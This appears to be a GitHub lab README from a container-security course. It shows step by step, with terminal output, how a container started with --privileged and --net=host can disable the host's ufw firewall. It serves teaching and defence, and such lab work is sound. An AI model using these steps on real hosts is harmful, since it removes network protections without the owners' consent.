Tamper Host Network Configuration

By setting `--privileged` and `--net=host` flag when running a container, network-stack of the host machine can be tampered with.

In this Attack, `Uncomplicated Firewall(ufw)` of the host-machine is disabled from a container.

Step 1:

Open Terminal

Step 2:

Check if ufw is enabled on the host machine by running ufw status

root@we45:~# ufw status
Status: inactive

Step 3:

Enable ufw by running ufw enable

root@we45:~# ufw enable
Firewall is active and enabled on system startup

Step 4:

Run docker run -d --privileged --net=host --name vul_flask abhaybhargav/vul_flask to start a docker container.

root@we45:~# docker run -d --privileged --net=host --name vul_flask abhaybhargav/vul_flask
6733abdce5042a90db8b7d40a08155470c727e8b3864eda519714e172f63be88

Step 5:

Run docker ps to view, all running containers.

root@we45:~# docker ps
CONTAINER ID        IMAGE                    COMMAND             CREATED             STATUS              PORTS               NAMES
d0169e5801fe        abhaybhargav/vul_flask   "python app.py"     24 seconds ago      Up 22 seconds       5050/tcp            vul_flask

Step 6:

Run docker exec -it vul_flask bash to exec into a running container.

root@we45:~# docker exec -it vul_flask bash
root@d0169e5801fe:/apps#

Step 7:

Install ufw on the container by running apt update && apt install -y ufw

root@we45:/apps# apt update && apt install -y ufw

Step 8:

Run ufw status to verify if ufw is running.

root@we45:/apps# ufw status
Status: active

Step 9:

To disable ufw of the host machine, run ufw disable on the container

root@we45:/apps# ufw disable
Firewall stopped and disabled on system startup

Run ufw status to verify ufw is stopped or not.

root@we45:/apps# ufw status
Status: inactive

Step 10:

Run exit to exit from the container

root@we45:/apps# exit
exit

Step 11:

Run ufw status in the host machine to verify if ufw has been disabled.

root@we45:~# ufw status
Status: inactive

Stop all running docker containers

Run clean-docker to stop all the containers

root@we45:~$ clean-docker

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Tamper Host Network Configuration

By setting `--privileged` and `--net=host` flag when running a container, network-stack of the host machine can be tampered with.

In this Attack, `Uncomplicated Firewall(ufw)` of the host-machine is disabled from a container.

Step 1:

Step 2:

Step 3:

Step 4:

Step 5:

Step 6:

Step 7:

Step 8:

Step 9:

Step 10:

Step 11:

Stop all running docker containers

Files

README.md

Latest commit

History

README.md

File metadata and controls

Tamper Host Network Configuration

By setting --privileged and --net=host flag when running a container, network-stack of the host machine can be tampered with.

In this Attack, Uncomplicated Firewall(ufw) of the host-machine is disabled from a container.

Step 1:

Step 2:

Step 3:

Step 4:

Step 5:

Step 6:

Step 7:

Step 8:

Step 9:

Step 10:

Step 11:

Stop all running docker containers

By setting `--privileged` and `--net=host` flag when running a container, network-stack of the host machine can be tampered with.

In this Attack, `Uncomplicated Firewall(ufw)` of the host-machine is disabled from a container.